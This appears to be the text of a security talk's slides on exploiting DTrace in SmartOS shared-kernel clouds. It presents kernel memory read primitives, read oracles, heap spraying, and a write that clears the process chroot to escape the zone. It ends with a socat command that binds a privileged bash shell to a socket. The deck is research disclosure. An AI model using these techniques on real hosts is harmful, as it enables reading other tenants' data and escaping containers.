DTrace Exploitation
Who am I?
Why DTrace?
- Joyent Public Cloud
- Shared Kernel
- 17k Lines of C Code
➜ illumos-joyent git:(master) ✗ wc -l .//usr/src/uts/common/dtrace/dtrace.c
17073 .//usr/src/uts/common/dtrace/dtrace.c
Shared Kernels in the Wild
- Amazon Lambda Functions
- Heroku
- Redshift Openshift
- Google Cloud Functions (?)
Shared Kernels on VMs
- Heroku / Amazon Lambda Functions
- Strictly worse security that VMs
- Strictly worse security than shared kernels
- Worse performance than shared kernels
SmartOS Hardening
- kmem_flags
- REDZONE (0x4)
- TEST (0x2)
- SMEP
- SMAP
DTrace Internals
- Bytecode based interpreter
- 8 registers
- Variables indexed by integers
- Supports 'raw' pointers
- Memory dereferences checked for validity
OP
R1
R2
RD/RS
LABEL
RD/RS
VAR/INT/STRING
DTrace Vulnerabilities
- 5 Arbitrary Kernel Memory Reads
- 3 Zone Escapes
DTrace Copyout
copyout(void* src, uintptr_t user_addr, size_t length);
- Copy Kernel Memory to Userspace
- No check whether `src` access is permitted
Copyout Implementation
case DIF_SUBR_COPYOUT: {
uintptr_t kaddr = tupregs[0].dttk_value;
uintptr_t uaddr = tupregs[1].dttk_value;
uint64_t size = tupregs[2].dttk_value;
if (!dtrace_destructive_disallow &&
dtrace_priv_proc_control(state, mstate) &&
!dtrace_istoxic(kaddr, size)) {
DTRACE_CPUFLAG_SET(CPU_DTRACE_NOFAULT);
dtrace_copyout(kaddr, uaddr, size, flags);
DTRACE_CPUFLAG_CLEAR(CPU_DTRACE_NOFAULT);
}
break;
}
Copy Check
void
dtrace_copyout(uintptr_t kaddr, uintptr_t uaddr, size_t size,
volatile uint16_t *flags)
{
if (dtrace_copycheck(uaddr, kaddr, size))
dtrace_copy(kaddr, uaddr, size);
}
static int
dtrace_copycheck(uintptr_t uaddr, uintptr_t kaddr, size_t size)
{
ASSERT(kaddr >= kernelbase && kaddr + size >= kaddr);
if (uaddr + size >= kernelbase || uaddr + size < uaddr) {
DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR);
cpu_core[CPU->cpu_id].cpuc_dtrace_illval = uaddr;
return (0);
}
return (1);
}
IOCTL DTrace Technique
syscall::ioctl:entry / arg1 == 0xDEADBEEF /
{ copyout((void*)arg2, (uintptr_t)arg3, arg4); }
char buf[sz];
ioctl(666, 0xDEADBEEF, addr, buf, sz);
Dumping Processes
- Linked list of processes at known address
- Use libctf in code to resolve symbols / offsets
dtrace -n 'BEGIN{ print(&`practive)}'
CPU ID FUNCTION:NAME
0 1 :BEGIN proc_t ** 0xfffffffffbc79eb8
Process Structure
typedef struct proc {
...
struct as *p_as; /* process address space pointer */
struct proc *p_next; /* active chain link next */
struct proc *p_prev; /* active chain link prev */
struct pid *p_pidp; /* process ID info */
caddr_t p_brkbase; /* base addr of heap */
struct user p_user; /* (see sys/user.h) */
} proc_t;
typedef struct user {
...
char u_comm[MAXCOMLEN + 1]; /* executable file name from exec */
char u_psargs[PSARGSZ]; /* arguments from exec */
...
} user_t;
Example Output
./global_ps
PID COMMAND PSARGS BRKBASE
8024 global_ps ./global_ps 0x414b90
8015 vim vim secret.txt 0x81f8be8
./global_ps segment -p 8015
ADDRESS SIZE FLAGS
0xfec2f000 4096
0x81ef000 188416 [heap]
KPM VBase
- Need to create new page table entries
- Need memory to put the new page table entries
- Needs to create new page table entries
Solution
- Map entire physical memory at virtual offset
- kpm_vbase in SmartOS
Read User Memory
- Convert user address to physical address using kernel
segment information. - Read physical memory using kpm_vbase
- Similar technique to Ret2User
inet_ntoa Vulnerability
- no dtrace_canload check
- use inet_pton to convert address back to bytes
- reads 4 bytes at a time
- can read 8 bytes with inet_ntoa6 but have to deal with tricky edge cases
string inet_ntoa(ipaddr_t *addr)
inet_ntoa Code
case DIF_SUBR_INET_NTOA:
case DIF_SUBR_INET_NTOA6:
case DIF_SUBR_INET_NTOP: {
...
if (af == AF_INET) {
/*
* Safely load the IPv4 address.
*/
ip4 = dtrace_load32(tupregs[argi].dttk_value);
dtrace_load##
dtrace_load##bits(uintptr_t addr) \
{ \
size_t size = bits / NBBY; \
/*CSTYLED*/ \
uint##bits___t rval; \
int i; \
volatile uint16_t *flags = (volatile uint16_t *) \
&cpu_core[CPU->cpu_id].cpuc_dtrace_flags; \
\
DTRACE_ALIGNCHECK(addr, size, flags); \
\
for (i = 0; i < dtrace_toxranges; i++) { \
if (addr >= dtrace_toxrange[i].dtt_limit) \
continue; \
\
if (addr + size <= dtrace_toxrange[i].dtt_base) \
continue; \
\
*flags |= CPU_DTRACE_BADADDR; \
cpu_core[CPU->cpu_id].cpuc_dtrace_illval = addr; \
return (0); \
} \
\
*flags |= CPU_DTRACE_NOFAULT; \
/*CSTYLED*/ \
rval = *((volatile uint##bits##_t *)addr); \
*flags &= ~CPU_DTRACE_NOFAULT; \
\
return (!(*flags & CPU_DTRACE_FAULT) ? rval : 0); \
}
inet_ntoa Example
> dtrace -n 'BEGIN{ print(inet_ntoa((in_addr_t*)&`_mmu_pagemask))}'
dtrace: description 'BEGIN' matched 1 probe
CPU ID FUNCTION:NAME
0 1 :BEGIN string "0.240.255.255"
Dynamic Variables
- pre-allocated hash map
- supports multiple keys
hash[key1, key2, key3] = value;
Hash Chunk
hashval
*next
*data
nkeys
*key value
key size
...
*key value
key size
DATA
dtrace_dynvar_t
Overwriting Chunk Metadata
- checks if writing to any of the 'metadata'
chunkoffs = (addr - base) % dstate->dtds_chunksize;
if (chunkoffs < sizeof (dtrace_dynvar_t))
return (0);
- dtrace_dynvar_t is a dynamic struct
- can write to key value in second tuple
- key value is a trusted pointer
Dynamic Variable Memory Read Oracle
- Create a hash with only room for 1 chunk
- Insert a value into the hash with the byte to check
- Find the address of the second key
- Overwrite the address with a kernel pointer
- Test if the byte value matches
- If no match DTrace triggers an overflow error
char buf[1];
buf[0] = 0x1;
hash[1, buf] = 'h';
addr = &hash[1,buf][0] - 0x28;
*(void**)addr = &`dtrace_dynhash_sink
print(&hash[1,buf][0])
DTrace strstr
string strstr(const char *s, const char *subs)
- checks if substring is contained in string
- hidden parameter limit which is global string size
strstr Implementation
case DIF_SUBR_STRRCHR: {
...
uintptr_t limit = addr + state->dts_options[DTRACEOPT_STRSIZE];
for (regs[rd] = NULL; addr < limit; addr++) {
if ((c = dtrace_load8(addr)) == target) {
regs[rd] = addr;
if (subr == DIF_SUBR_STRCHR)
break;
}
if (c == '\0')
break;
}
if (!dtrace_canload(saddr, addr - saddr, mstate, vstate)) {
regs[rd] = NULL;
break;
}
libcpc
- API to activate hardware performance counters
- Counters can be set to run in kernel only
- PAPI_br_ins records number of branches taken
strstr Memory Read Oracle
- set global string size to 1 so only 1 character is checked
- call strstr with address to check and a byte to check
- record branches taken in the kernel
- 645 byte matches
- 646 byte doesn't match
- 646 for all byte values => null byte
- repeat for all byte values (256)
- sometimes takes an extra branch (toxic ranges?)
Out of bounds read for variables
- STGS instruction had no bounds check
case DIF_OP_STGS:
id = DIF_INSTR_VAR(instr);
ASSERT(id >= DIF_VAR_OTHER_UBASE);
id -= DIF_VAR_OTHER_UBASE;
svar = vstate->dtvs_globals[id];
- Accesses random garbage memory?
SLAB Allocator
- SmartOS uses a SLAB Allocator
- Objects of the same size are allocated together
- Freelists for SLAB is a stack
- CPUs also have their own magazines
- Allocate pointers to fake variables in user memory after the real pointers
Smart Solution
- Idea from 'Attacking the Core'
- Allocate memory until a new SLAB is allocated
- Use /dev/kstat
- Make dummy allocation
- Make allocation of fake pointers
- Free dummy allocation
Dummy
Fake
Free
Free
Free
Fake
Free
Free
Example kstat Output
> kstat -n kmem_alloc_64
module: unix instance: 0
name: kmem_alloc_64 class: kmem_cache
align 64
alloc 4459955
alloc_fail 0
buf_avail 32918
buf_constructed 32859
buf_inuse 36522
buf_max 69440
buf_size 64
buf_total 69440
Dumb Solution
- Spray the heap with the fake pointer allocations
- Deallocate holes
- Pray the kernel allocates into one of these holes
???
Fake
Fake
???
???
Free
Fake
???
Target SLAB
Free Block
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Fake Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
Real Var Pointer
SMAP
- Works except on modern processors
- Supervisor Mode Access Prevention
Solution
- Allocate Fake Variables in Kernel Space
Arbitrary Kernel Allocations
dtrace -n 'BEGIN{ x = "hello world"; print(&x[0])}'
CPU ID FUNCTION:NAME
0 1 :BEGIN char * 0xffffff00d65c7788
Kernel Arbitrary Write
- What should we corrupt?
- Single variable u_rdir on proc_t struct
- Controls the chroot
- null => no chroot
How do we get this value?
dtrace -n 'BEGIN{ print(&curthread->t_procp->p_user.u_rdir)}'
CPU ID FUNCTION:NAME
0 1 :BEGIN struct vnode ** 0xffffff00c8ed38b0
Attacking the Core Method
od -A none -j 40 -N 8 -t x8z < /proc/$$/psinfo
ffffff00c8ee9028
We have a problem
if (regs[rd] == NULL) {
*(uint8_t *)a = UINT8_MAX;
break;
} else {
*(uint8_t *)a = 0;
a += sizeof (uint64_t);
}
...
dtrace_vcopy((void *)(uintptr_t)regs[rd],
(void *)a, &v->dtdv_type);
Start from u_envp
typedef struct user {
..
uintptr_t u_envp; /* value of envp passed to main() */
struct vnode *u_cdir; /* current directory */
struct vnode *u_rdir; /* root directory */
..
}
- u_envp doesn't matter
- write 16 bytes of zero
- u_cdir can be set to null but will crash on fork
- use chdir to fix broken u_cdir
Full Privileges
echo "/usr/bin/socat UNIX-LISTEN:$PWD/badsock,fork exec:bash,stderr,setsid"
| at now + 1 minute
socat - UNIX-CONNECT:$PWD/badsock
zonename
global
ppriv $$
4553: bash
flags = <none>
E: all
I: basic
P: all
L: all
Dtrace Exploitation
By Ben Murphy
Dtrace Exploitation
- 1,144